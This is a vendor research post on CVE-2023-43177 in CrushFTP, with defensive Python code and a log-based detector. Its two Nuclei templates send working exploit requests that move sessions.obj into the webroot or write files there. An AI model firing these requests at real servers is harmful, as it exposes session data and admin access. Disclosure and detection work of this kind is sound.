CrushFTP - CVE-2023-43177 Unauthenticated Remote Code Execution
CVE-2023-43177 is a critical vulnerability in CrushFTP. It could allow unauthenticated attackers with network access to the CrushFTP instance to write files to the local file system and, in some versions, could ultimately allow the execution of arbitrary system commands.
Technical Details
Based on the information shared in the original blog post at https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/, we set out to gain a deeper understanding of the vulnerability. By default, the CrushFTP application issues an anonymous, authenticated session cookie whenever a request is made. Consequently, the distinction between an authenticated user and an unauthenticated user is blurred.
The application's logic works as follows: when the request includes the "as2-to" header, the keys of the "user_info" session object are populated from user input, specifically from the request headers. At the end of request processing, drain_log() is called; it writes the request's details, including specific request headers and other pertinent information, to the log files.
Interestingly, the locations where the log entries are written are determined by specific keys within the "user_info" session object. Because these keys can be supplied via request headers once the "as2-to" header is present, an attacker can control the location of the log file, or even the log file itself.
These are the headers that alter the log-writing logic:
- user_log_path - The directory from which the file is moved (moved, because the file is deleted from its original location once it has been moved successfully).
- user_log_file - The filename that gets moved.
- user_log_path_custom - The new location where the logs should be written.
- dont_log - When set to "true", nothing is logged (appended) to the file.
In other words, we can copy any file from the filesystem into the webroot, with the caveat that the file is removed from its original location. Within the application directory there is a vital file named "sessions.obj" that holds details about the currently active sessions. This file is automatically recreated if it is deleted, which makes it the perfect target for this vulnerability: access to "sessions.obj" could grant an attacker admin privileges on the CrushFTP instance.
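To make the flaw concrete from a defender's side, here is a simplified model of binding request headers into a session object. This is an added illustration, not CrushFTP's code: the class names, the allowlist, LOG_ROOT and the log-path derivation are assumptions. The vulnerable binder copies every header once "as2-to" is present, so user_log_path, user_log_file and user_log_path_custom end up steering where the log is written; the hardened binder copies only an allowlisted set of AS2 headers under a namespaced key, and a separate confinement check keeps the resolved path inside the log root regardless of where the keys came from.

```python
"""Simplified model of CWE-913 as described for CVE-2023-43177: request headers
bound straight into a session object decide where a log file is written.
Added illustration only; this is not CrushFTP's code. The class names, the
allowlist, LOG_ROOT and the log-path derivation are assumptions."""
from dataclasses import dataclass, field
import posixpath

LOG_ROOT = "/opt/app/logs"  # assumed directory where logs legitimately live


@dataclass
class Request:
    headers: dict  # lower-cased header name -> value


@dataclass
class Session:
    user_info: dict = field(default_factory=lambda: {"user_name": "anonymous"})


def vulnerable_bind(session: Session, req: Request) -> None:
    """Models the flawed behaviour: once 'as2-to' is present, every request
    header becomes a key of user_info, so the sender can set user_log_path,
    user_log_file and user_log_path_custom."""
    if "as2-to" in req.headers:
        for name, value in req.headers.items():
            session.user_info[name] = value


# Assumed allowlist of AS2 headers a message actually needs.
ALLOWED_AS2_HEADERS = frozenset({"as2-to", "as2-from", "message-id"})


def hardened_bind(session: Session, req: Request) -> None:
    """Copies only allowlisted AS2 headers, under a namespaced key, so request
    input can never collide with configuration keys such as user_log_path."""
    if "as2-to" in req.headers:
        session.user_info["as2"] = {
            name: req.headers[name] for name in ALLOWED_AS2_HEADERS if name in req.headers
        }


def resolve_log_path(session: Session) -> str:
    """Where drain_log() would write, derived from session keys (modelled
    after the post's description; the precedence order is an assumption)."""
    directory = (
        session.user_info.get("user_log_path_custom")
        or session.user_info.get("user_log_path")
        or LOG_ROOT
    )
    filename = session.user_info.get("user_log_file") or "request.log"
    return posixpath.normpath(posixpath.join(directory, filename))


def is_confined(path: str, root: str = LOG_ROOT) -> bool:
    """Defensive check a log writer should apply no matter where the path
    came from: the normalised target must stay inside the log root."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def log_target(bind, req: Request) -> tuple[str, bool]:
    """Run one binder on a fresh session; returns (resolved path, confined?)."""
    session = Session()
    bind(session, req)
    path = resolve_log_path(session)
    return path, is_confined(path)


if __name__ == "__main__":
    # Constructed request mirroring the headers the post lists.
    attack = Request(headers={
        "as2-to": "X",
        "user_log_path": "./",
        "user_log_path_custom": "./WebInterface/ab12cd/",
        "user_log_file": "sessions.obj",
        "dont_log": "true",
    })
    print("vulnerable:", log_target(vulnerable_bind, attack))
    print("hardened:  ", log_target(hardened_bind, attack))
```

The two fixes are independent: the allowlist stops request input from ever becoming a configuration key, and the confinement check would still catch a path such as "/opt/app/logs/../../etc" even if some other code path put it in the session.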
Nuclei template to detect CVE-2023-43177 on CrushFTP 10.5
```yaml
id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.00106
    epss-percentile: 0.42673
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce

flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(8)}}"

http:
  # Step 1: obtain the anonymous session cookies the application hands out by default.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  # Step 2: the as2-to header makes the user_log_* headers land in user_info,
  # so sessions.obj is moved into a random directory under the webroot.
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{randstr}}
      user_log_path: "./"
      user_log_path_custom: "./WebInterface/{{dirname}}/"
      user_log_file: sessions.obj
      dont_log: true
      Content-Type: application/x-www-form-urlencoded
    body: |
      post=body

  # Step 3: confirm the moved file is now served from the webroot.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/sessions.obj"

    max-size: 5000
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(header, 'application/binary')
          - contains_any(to_lower(header), 'webinterface', 'crushftp')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - content_length
```
However, we observed that in our specific version, this exploit didn't perform as anticipated. Following the usual process of decompiling and debugging, we uncovered a crucial distinction. In versions before approximately 10.4, the logic did not incorporate "user_log_path_custom" in the log-writing workflow. Instead, the mechanism in place involves the creation of a specified directory or file and logging the request into it, rather than simply copying a file. Consequently, while this approach provides a file write primitive anywhere in the system, it doesn't afford complete control over the content. As a result, it appears that exploiting it for remote code execution may not be feasible, or at least, not based on our current understanding.
Nuclei template to detect CVE-2023-43177 on CrushFTP <= 10.4
```yaml
id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.00106
    epss-percentile: 0.42673
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
  tags: cve,cve2023,crushftp,unauth,rce

flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  # Step 1: obtain the anonymous session cookies the application hands out by default.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  # Step 2: on these versions the user_log_* headers create the directory and
  # file and log the request into it (a file write, not a file move).
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"

    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{{filename}}"
      Content-Type: application/x-www-form-urlencoded

    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  # Step 3: the created log file is served from the webroot and contains the
  # user_name sent in step 2.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and
```
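Teams that would rather look back through reverse-proxy access logs than probe hosts can key on the same signals the two templates rely on: the "as2-to" header arriving together with any of the user_log_* or dont_log headers, and any request for sessions.obj through the web interface. The following script is an added example, not part of this post or of the Nuclei templates; the JSON-lines log shape and the sample entries are constructed for illustration, so adapt the field names to whatever your proxy emits.

```python
"""Retrospective detection of CVE-2023-43177 exploitation attempts in
reverse-proxy access logs. Added example; the JSON-lines log format, field
names and sample entries are constructed for illustration."""
import json
import re

# Request headers the post describes as controlling where drain_log() writes.
LOG_CONTROL_HEADERS = frozenset(
    {"user_log_path", "user_log_file", "user_log_path_custom", "dont_log"}
)
# sessions.obj lives in the application directory and should never be a web path.
SESSIONS_OBJ_RE = re.compile(r"/sessions\.obj$", re.IGNORECASE)

# Constructed sample log: one JSON object per line, request headers captured.
SAMPLE_LOG = "\n".join([
    json.dumps({"ts": "2023-11-18T10:00:01Z", "src": "198.51.100.7", "method": "GET",
                "path": "/WebInterface", "status": 200,
                "headers": {"User-Agent": "x"}}),
    json.dumps({"ts": "2023-11-18T10:00:02Z", "src": "198.51.100.7", "method": "POST",
                "path": "/WebInterface/function/?command=getUsername", "status": 200,
                "headers": {"as2-to": "X", "user_log_path": "./",
                            "user_log_path_custom": "./WebInterface/ab12cd/",
                            "user_log_file": "sessions.obj", "dont_log": "true"}}),
    json.dumps({"ts": "2023-11-18T10:00:03Z", "src": "198.51.100.7", "method": "GET",
                "path": "/WebInterface/ab12cd/sessions.obj", "status": 200,
                "headers": {"User-Agent": "x"}}),
    # Legitimate AS2 traffic carries as2-to without any log-control headers.
    json.dumps({"ts": "2023-11-18T10:05:00Z", "src": "203.0.113.9", "method": "POST",
                "path": "/as2", "status": 200,
                "headers": {"as2-to": "partner", "as2-from": "us"}}),
])


def classify(entry: dict) -> list[str]:
    """Return the reasons one access-log entry looks like CVE-2023-43177 activity."""
    findings = []
    headers = {name.lower(): value for name, value in entry.get("headers", {}).items()}
    if "as2-to" in headers:
        touched = sorted(LOG_CONTROL_HEADERS & headers.keys())
        if touched:
            findings.append("as2-to combined with log-control headers: " + ", ".join(touched))
    path = entry.get("path", "").split("?", 1)[0]
    if SESSIONS_OBJ_RE.search(path):
        findings.append(
            f"request for sessions.obj over the web interface (status {entry.get('status')})"
        )
    return findings


def scan(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Scan JSON-lines access logs; returns (line number, source, findings) per hit."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than abort the whole scan
        findings = classify(entry)
        if findings:
            hits.append((number, entry.get("src", "?"), findings))
    return hits


if __name__ == "__main__":
    for number, src, findings in scan(SAMPLE_LOG):
        print(f"line {number} from {src}: " + "; ".join(findings))
```

A status 200 on the sessions.obj fetch is the strongest indicator, since it means the file was actually served from the webroot; on the older versions the post describes, the equivalent signal is a 200 for a freshly created file under a random directory below /WebInterface/, so correlate the POST and the following GET from the same source.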
By embracing Nuclei and participating in the open-source community or joining the ProjectDiscovery Cloud Platform, organizations can strengthen their security defenses, stay ahead of emerging threats, and create a safer digital environment. Security is a collective effort, and together we can continuously evolve and tackle the challenges posed by cyber threats.
- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research